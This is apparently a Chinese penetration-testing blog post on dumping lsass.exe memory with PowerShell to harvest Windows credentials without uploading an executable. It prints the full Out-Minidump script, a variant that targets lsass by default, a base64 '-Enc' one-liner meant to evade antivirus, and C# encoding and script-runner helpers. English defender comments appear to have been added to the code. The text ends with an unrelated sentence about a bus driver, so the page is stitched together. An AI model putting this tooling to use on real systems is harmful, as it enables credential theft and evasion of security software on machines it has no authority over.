渗透者无exe dump内存

发布于 2019-09-09  44 次阅读


在渗透过程中经常需要获取目标主机上的密码。
常见工具为 GetPwd 以及 Mimikatz，但是这些工具往往会被杀软查杀得很厉害，
直接用 procdump 也必须先上传 EXE，动作比较大，于是对 dump lsass.exe 内存的方式进行研究。

现摘取网上一段迷你 dump（Out-Minidump）的 PowerShell 脚本代码：

# Out-Minidump: writes a full-memory minidump (MiniDumpWriteDump with MiniDumpWithFullMemory)
# of the given process to "<ProcessName>_<PID>.dmp" under -DumpFilePath. The page uses it
# against lsass.exe, i.e. it is a credential-dumping primitive. Defender notes:
#  * it needs an elevated caller (the page itself states an administrator PowerShell is required);
#  * it opens a handle on the target process — for lsass that is the ProcessAccess signal
#    (e.g. Sysmon Event ID 10) that EDR/SIEM rules alert on;
#  * LSA protection (RunAsPPL) and Credential Guard are the mitigations that defeat this read;
#  * the on-disk artefact is "<ProcessName>_<PID>.dmp" (lsass_<pid>.dmp when run as shown) and
#    must itself be treated as a credential store.
function Out-Minidump
{
[CmdletBinding()]
Param (
# Target process; accepts pipeline input so "Get-Process x | Out-Minidump" works.
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)]
[System.Diagnostics.Process]
$Process ,
# Directory the .dmp file is written to; must already exist. Defaults to the current directory.
[Parameter(Position = 1)]
[ValidateScript({ Test-Path $_ })]
[String]
$DumpFilePath = $PWD
)
BEGIN
{
# Reach the non-public MiniDumpWriteDump P/Invoke that already exists inside
# System.Management.Automation (WindowsErrorReporting+NativeMethods) via reflection, so the
# script never declares a DllImport of its own and never compiles anything with Add-Type.
$WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')
$WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')
$Flags = [Reflection.BindingFlags] 'NonPublic, Static'
$MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)
# MINIDUMP_TYPE 2 = MiniDumpWithFullMemory: the whole address space goes into the file,
# which is exactly what makes an lsass dump valuable to an attacker.
$MiniDumpWithFullMemory = [UInt32] 2
}
PROCESS
{
$ProcessId = $Process.Id
$ProcessName = $Process.Name
# Reading .Handle opens a handle on the target process; this is the access event defenders monitor.
$ProcessHandle = $Process.Handle
$ProcessFileName = "$($ProcessName)_$($ProcessId).dmp"
$ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName
$FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)
# MiniDumpWriteDump(hProcess, pid, hFile, dumpType, exceptionParam, userStreamParam, callbackParam);
# the three trailing IntPtr::Zero arguments are the optional pointer parameters left unused.
$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,$ProcessId,$FileStream.SafeFileHandle,$MiniDumpWithFullMemory,[IntPtr]::Zero,[IntPtr]::Zero,[IntPtr]::Zero))
$FileStream.Close()
if (-not $Result)
{
# The parameterless Win32Exception constructor picks up the last Win32 error of the failed call.
$Exception = New-Object ComponentModel.Win32Exception
$ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))"
# Remove any partially written dump files. For example, a partial dump will be written
# in the case when 32-bit PowerShell tries to dump a 64-bit process.
Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue
throw $ExceptionMessage
}
else
{
# Success: emit the FileInfo of the dump so callers can see where it landed.
Get-ChildItem $ProcessDumpPath
}
}
END {}
}

执行方法:
//Out-Minidump -Process (Get-Process -Id 4293)
//Get-Process lsass | Out-Minidump

执行起来过于麻烦，而且是未经 Base64 编码的明文脚本，容易被拦截查杀，遂对代码进行整改。
修改后可一句执行：

# Script-body variant of Out-Minidump: the function wrapper is gone, so this text runs as a
# whole script, and $Process defaults to (Get-Process lsass) — executing it with no arguments
# dumps lsass.exe to "lsass_<pid>.dmp" in the current directory. The page then encodes this
# script as UTF-16LE base64 for "powershell.exe -Enc". Defender notes:
#  * a long -Enc/-EncodedCommand argument is itself a common detection (process-creation
#    logging: Windows 4688 / Sysmon Event ID 1);
#  * the handle opened on lsass is the ProcessAccess signal (Sysmon Event ID 10);
#  * LSA protection (RunAsPPL) and Credential Guard are the mitigations that defeat the read;
#  * an elevated caller is required (the page says so explicitly).
Param (
# Target process; defaults to lsass. The [Parameter()] attributes keep this an advanced script
# even though [CmdletBinding()] was dropped from the original.
[Parameter(Position = 0)] 
[System.Diagnostics.Process]
$Process = (Get-Process lsass),
# Directory the .dmp file is written to; must already exist. Defaults to the current directory.
[Parameter(Position = 1)]
[ValidateScript({ Test-Path $_ })]
[String]
$DumpFilePath = $PWD
)
BEGIN
{
# Reuse the non-public MiniDumpWriteDump P/Invoke inside System.Management.Automation
# (WindowsErrorReporting+NativeMethods) via reflection; no DllImport or Add-Type in the script.
$WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')
$WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')
$Flags = [Reflection.BindingFlags] 'NonPublic, Static'
$MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)
# MINIDUMP_TYPE 2 = MiniDumpWithFullMemory: full address space, hence a usable credential dump.
$MiniDumpWithFullMemory = [UInt32] 2
}
PROCESS
{
$ProcessId = $Process.Id
$ProcessName = $Process.Name
# Reading .Handle opens the handle on the target process that defenders monitor for.
$ProcessHandle = $Process.Handle
$ProcessFileName = "$($ProcessName)_$($ProcessId).dmp"
$ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName
$FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)
# MiniDumpWriteDump(hProcess, pid, hFile, dumpType, exceptionParam, userStreamParam, callbackParam)
$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,$ProcessId,$FileStream.SafeFileHandle,$MiniDumpWithFullMemory,[IntPtr]::Zero,[IntPtr]::Zero,[IntPtr]::Zero))
$FileStream.Close()
if (-not $Result)
{
# The parameterless Win32Exception constructor picks up the last Win32 error of the failed call.
$Exception = New-Object ComponentModel.Win32Exception
$ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))"
# Remove any partially written dump files. For example, a partial dump will be written
# in the case when 32-bit PowerShell tries to dump a 64-bit process.
Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue
throw $ExceptionMessage
}
else
{
# Success: emit the FileInfo of the dump file.
Get-ChildItem $ProcessDumpPath
}
}
END {}

修改后的脚本可以直接执行，一键 dump，随后进行 Base64 编码。

转换为 Base64 一句话命令后：

powershell.exe -Enc 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

一句就可以对 lsass.exe的内存进行dump
执行截图(需要管理员权限的powershell)

发现做 Base64 编码时还有一个宽字节（UTF-16LE）问题，否则编码后不可用，遂自行编写了编码工具。

主要代码如下

private void button1_Click(object sender, EventArgs e)
    {
        // Encode the text in textBox1 as UTF-16LE base64 — the layout powershell.exe -EncodedCommand
        // expects — optionally prefixed with the launcher string when checkBox1 is ticked.
        // The result is shown in textBox2 and placed on the clipboard; any failure is shown in a
        // message box instead of propagating.
        try
        {
            string plain = this.textBox1.Text;
            byte[] utf16 = System.Text.Encoding.Unicode.GetBytes(plain);
            string encoded = Convert.ToBase64String(utf16);
            if (checkBox1.Checked)
            {
                encoded = "powershell.exe -Enc " + encoded;
            }
            this.textBox2.Text = encoded;
            Clipboard.SetDataObject(this.textBox2.Text);
        }
        catch (Exception ex)
        {
            MessageBox.Show(ex.ToString());
        }
    }
    /// <summary>
    /// Decodes a base64 string and interprets the bytes with <paramref name="encode"/>.
    /// </summary>
    /// <param name="encode">Text encoding used to turn the decoded bytes into a string.</param>
    /// <param name="result">Base64 input.</param>
    /// <returns>The decoded text, or <paramref name="result"/> unchanged if the bytes cannot be
    /// turned into text with <paramref name="encode"/>.</returns>
    /// <exception cref="FormatException">Thrown when <paramref name="result"/> is not valid base64:
    /// note that FromBase64String runs outside the try, so only the GetString step falls back.</exception>
    public static string DecodeBase64(Encoding encode, string result)
    {
        byte[] raw = Convert.FromBase64String(result);
        string text;
        try
        {
            text = encode.GetString(raw);
        }
        catch
        {
            // Undecodable bytes: hand the caller the original input rather than failing.
            text = result;
        }
        return text;
    }

    private void button2_Click(object sender, EventArgs e)
    {
        // Reverse of button1_Click: drop the "powershell.exe -Enc" launcher prefix, base64-decode the
        // remainder as UTF-16LE and show the plain script in textBox1 (also copied to the clipboard).
        // String.Replace is a no-op when the prefix is absent, so no separate Contains check is needed.
        // Failures (e.g. malformed base64 from DecodeBase64) are shown in a message box.
        try
        {
            string encoded = this.textBox2.Text
                .Replace("powershell.exe -Enc", "")
                .Trim();
            string plain = DecodeBase64(System.Text.Encoding.Unicode, encoded);
            this.textBox1.Text = plain;
            Clipboard.SetDataObject(this.textBox1.Text);
        }
        catch (Exception ex)
        {
            MessageBox.Show(ex.ToString());
        }
    }
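private static string RunScript(string scriptText)  // run one script and return its textual output
    {
        // Executes scriptText in a fresh PowerShell runspace, pipes the objects through Out-String
        // and returns the concatenated text, one line per result object.
        // Throws: whatever pipeline.Invoke throws (script errors, missing PowerShell host);
        //         callers must handle it.
        // Fix: the runspace is now disposed on every path — the original only closed it on the
        // success path, so an exception from Invoke leaked the runspace.
        // Security: scriptText is executed as code. Never pass text an untrusted party controls.
        StringBuilder stringBuilder = new StringBuilder();
        using (Runspace runspace = RunspaceFactory.CreateRunspace())
        {
            runspace.Open();
            Pipeline pipeline = runspace.CreatePipeline();
            pipeline.Commands.AddScript(scriptText);
            // Out-String turns every output object into text so the caller gets a plain string.
            pipeline.Commands.Add("Out-String");
            Collection<PSObject> results = pipeline.Invoke();
            foreach (PSObject obj in results)
            {
                stringBuilder.AppendLine(obj.ToString());
            }
            runspace.Close();
        }
        return stringBuilder.ToString();
    }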
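    public void RunScript(List<string> scripts) // run several scripts in one pipeline; output is discarded
    {
        // Adds each entry of `scripts` to a single pipeline in a fresh runspace and invokes it.
        // Output is not returned (use RunScript(string) for that); any failure is reported through
        // a message box instead of propagating, so callers cannot tell success from failure.
        // Fix: the runspace is now disposed on every path — the original leaked it when Invoke threw.
        // Security: every element of `scripts` is executed as PowerShell code; never pass text an
        // untrusted party controls.
        try
        {
            using (Runspace runspace = RunspaceFactory.CreateRunspace())
            {
                runspace.Open();
                Pipeline pipeline = runspace.CreatePipeline();
                foreach (var scr in scripts)
                {
                    pipeline.Commands.AddScript(scr);
                }
                // Invoked for side effects only; the result collection was never used.
                pipeline.Invoke();
                runspace.Close();
            }
        }
        catch (Exception e)
        {
            MessageBox.Show(DateTime.Now.ToString() + "日志记录:执行ps命令异常:" + e.Message);
        }
    }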

公交车司机终于在众人的指责中将座位让给了老太太